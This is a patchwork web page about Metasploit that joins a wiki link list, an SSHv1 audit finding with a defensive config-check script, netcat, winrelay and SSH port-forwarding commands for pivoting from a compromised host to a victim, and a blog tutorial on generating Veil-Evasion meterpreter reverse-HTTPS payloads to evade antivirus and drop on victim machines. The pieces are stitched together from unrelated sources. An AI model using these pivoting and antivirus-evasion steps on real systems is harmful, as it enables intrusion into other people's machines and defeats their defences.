Ssh Metasploit



Discussions and solutions to the most common problems people run into when developing or delivering exploits with Metasploit. A payload is a piece of code that is executed through a given exploit. Have a look at the Metasploit Framework; it is simply a collection of exploits.

Any and all resources related to Metasploit on this wiki:

MSF - on the Metasploit framework generally.
Category:Metasploit - pages labeled with the 'Metasploit' category label.
MSF/Wordlists - wordlists that come bundled with Metasploit.
MSFVenom - msfvenom is used to craft payloads.
Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.

The SSH server supports SSH version 1 clients. Version 1 of the SSH protocol contains fundamental weaknesses which make sessions vulnerable to man-in-the-middle attacks. Since all modern SSH clients have supported SSH v2 for at least 5 years, there is no reason to support SSHv1.
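The SSHv1 finding above is the kind of thing a configuration audit should catch. As an added example (not code from the original page), a small POSIX shell check that reports whether an sshd_config still permits SSH-1; the sample config contents are constructed, and the check assumes the pre-7.6 OpenSSH "Protocol" directive (OpenSSH 7.6 removed SSH-1 support entirely, so on newer releases the directive is ignored).

```shell
#!/bin/sh
# Added example, not from the original page: flag an sshd_config that still
# permits the SSH-1 protocol. Assumes the classic OpenSSH "Protocol" directive
# (releases before 7.6). sshd honours the FIRST occurrence of a keyword, and
# older releases defaulted to "2,1" when the directive was absent, so a
# missing directive is treated as weak.

# sshv1_allowed CONFIG_FILE: exit 0 if SSH-1 may be negotiated, 1 if SSH-2 only.
sshv1_allowed() {
    proto=$(grep -Ei '^[[:space:]]*Protocol[[:space:]]+' "$1" | head -n 1 | awk '{print $2}')
    case "$proto" in
        "")  return 0 ;;   # directive absent: old default "2,1"
        *1*) return 0 ;;   # "1", "2,1" or "1,2": SSH-1 reachable
        *)   return 1 ;;   # "2": SSH-2 only
    esac
}

# Constructed sample configs: the weak setting beside the corrected one.
WEAK_CFG=$(mktemp)
FIXED_CFG=$(mktemp)
trap 'rm -f "$WEAK_CFG" "$FIXED_CFG"' EXIT
printf 'Port 22\nProtocol 2,1\nPermitRootLogin no\n' > "$WEAK_CFG"
printf 'Port 22\nProtocol 2\nPermitRootLogin no\n' > "$FIXED_CFG"

for cfg in "$WEAK_CFG" "$FIXED_CFG"; do
    if sshv1_allowed "$cfg"; then
        echo "$cfg: SSH-1 allowed - set 'Protocol 2' and restart sshd"
    else
        echo "$cfg: SSH-2 only"
    fi
done
```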

NETCAT as Port Forwarder / TCP Relay

[attacker machine] ---> [compromised host] ---> [VICTIM]

root@compromised-host # mkfifo backpipe
root@compromised-host # nc -n -v -l -p 80 0<backpipe | nc p.q.r.2 445 1>backpipe

root@attackers-box # ./smb-exploit p.q.r.1 80

The local TCP port 80 of the compromised host is forwarded to the VICTIM’S TCP port 445.

Port Forwarding using winrelay
If the compromised machine is a Windows box we can also use winrelay or fpipe:

D:\> winrelay.exe -lip p.q.r.1 -lp 80 -dip p.q.r.2 -dp 445 -proto tcp

Metasploit's Meterpreter also has a port forwarding feature. Its key options are:

-L = the local IP address where the listening port will bind
-r = the remote host

The same relay can be built with an SSH remote (reverse) port forward from the compromised host back to the attacker's box a.b.c.d, so that port 80 on a.b.c.d reaches the VICTIM's port 445 through the compromised host:

root@compromised-host # ssh -f -N -R 80:p.q.r.2:445 root@a.b.c.d

I am a big fan of using meterpreter as a post-compromise payload. It has so many tools that make all the next steps so much easier. The problem is, every antivirus out there will catch meterpreter. Metasploit comes with a handy obfuscator, but even that always gets caught now.

For a long time, everyone had their tricks to obfuscate meterpreter payloads, but nobody wanted to share for fear of antivirus companies finding out about them. My trick was to generate a raw shellcode payload, then use a Python script called shellcode2exe that converted the shellcode to an executable file (it used mingw32). When that quit working, I found the Veil Framework. This post will focus on the Veil-Evasion part of the Veil framework.

The authors of Veil took all of the neat obfuscation tricks they could find and packaged them up into one easy-to-use Python script.

Setup Your Testbed

The victim machine needs to be any Windows machine. In this example, we’ll be using Windows 7 64-bit. Install an antivirus to see how well it (doesn’t) catch the payload.

The attacker machine should be a machine running Kali Linux. Veil is not installed by default, but there are two easy ways to install it: by running apt-get or simply downloading from the Git repository. Some users have issues with the apt-get method, and the Git repository will be the most up-to-date version, so that is my preferred method.

Apt-get method:

# apt-get install veil
# cd /usr/share/veil-evasion/setup/
# ./setup.sh

Git method:

$ git clone https://github.com/Veil-Framework/Veil-Evasion.git
$ cd Veil-Evasion/setup/
$ ./setup.sh

The setup.sh process can take a while. The end result is a Veil-Evasion.py program you can use.

Attack

How do you find a vulnerable host?

This post is strictly about post exploitation and antivirus evasion. Find your own way into a Windows machine. Once you are there, you should be able to run meterpreter, with or without antivirus being installed.

How do you attack that host?

First, use veil to generate the payload. Run the Veil-Evasion.py script from wherever you did your git pull.

Currently there are 40 options for payloads (but the authors frequently add more). The "list" command will show all the options available.

Different payloads can be used slightly differently. For example, the PowerShell payloads have the benefit of being loaded straight into memory rather than written to the hard disk, as described in a previous blog post. The compiled versions (like the C or C# ones) may or may not be caught by your antivirus of choice (not all will evade antivirus completely), but most likely there will be a couple that work.

In this example, I will generate a payload for #9, or cs/meterpreter/rev_https. The command is "use cs/meterpreter/rev_https" (or just "use 9").

Finally, I'm going to set the LHOST to the IP address of my Kali machine and then generate the resulting payload. When it asked, I told it to call the payload "colesec".

Now take the compiled colesec.exe payload and drop it on the victim machine. Before running it though, start up the meterpreter handler in metasploit. Veil makes this really easy by creating a handler file.

# msfconsole -r /usr/share/veil-output/handlers/colesec_handler.rc

Once metasploit loads up, go ahead and run the executable on the victim machine. It should all work!

Note that Veil has more parts to the framework than just Veil-Evasion. Check out some of the other modules, especially Veil-Catapult for payload delivery.
